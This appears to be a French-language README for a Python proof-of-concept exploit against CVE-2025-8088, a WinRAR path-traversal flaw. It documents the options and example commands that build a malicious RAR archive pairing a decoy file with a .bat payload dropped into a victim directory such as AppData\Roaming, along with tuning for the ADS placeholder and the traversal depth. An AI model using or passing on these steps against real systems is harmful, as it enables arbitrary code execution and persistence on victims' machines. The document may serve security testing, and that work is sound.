
Preuve de concept pour CVE-2025-8088, une vulnérabilité de traversée de chemin dans WinRAR permettant l'exécution de code arbitraire via des archives RAR spécialement conçues. Inclut un script Python avec des chemins de leurre, de charge utile et de dépôt configurables pour les tests de sécurité autorisés.
Exploit_cve_2025_8088.ps1
python poc.py

| Argument | Description | Exemple |
|---|---|---|
--decoy | Chemin vers le fichier leurre (créé s'il n'existe pas) | resume.txt |
--payload | Chemin vers le fichier payload (créé s'il n'existe pas) | payload.bat |
--drop | Chemin absolu vers le répertoire cible où le payload sera extrait | C:\Users\Victim\Documents |
| Argument | Description | Valeur par défaut | Notes |
|---|---|---|---|
--rar | Chemin vers rar.exe | Découvert automatiquement | Vérifiera les emplacements courants et le PATH |
--out | Nom du fichier RAR de sortie | poc-cve-2025-8088.rar | Archive malveillante finale |
--workdir | Répertoire de travail pour les fichiers temporaires | Répertoire courant (.) | |
--placeholder_len | Longueur du placeholder ADS | max(len(target_path), 128) | Plus long = traversée plus fiable |
--max_up | Nombre de traversées de répertoire parent (..\) | 16 | Minimum 8 recommandé |
--base_out | Nom de fichier RAR de base intermédiaire | <out>.base.rar | Fichier temporaire, supprimé après |
# Basic usage (auto-discover rar.exe)
python poc.py --decoy resume.txt --payload payload.bat --drop "C:\Users\Victim\Documents"
# Full custom configuration
python poc.py \
--decoy document.pdf \
--payload script.bat \
--drop "C:\Users\Victim\AppData\Roaming" \
--rar "C:\Program Files\WinRAR\rar.exe" \
--out malicious.rar \
--workdir ./build \
--placeholder_len 150 \
--max_up 20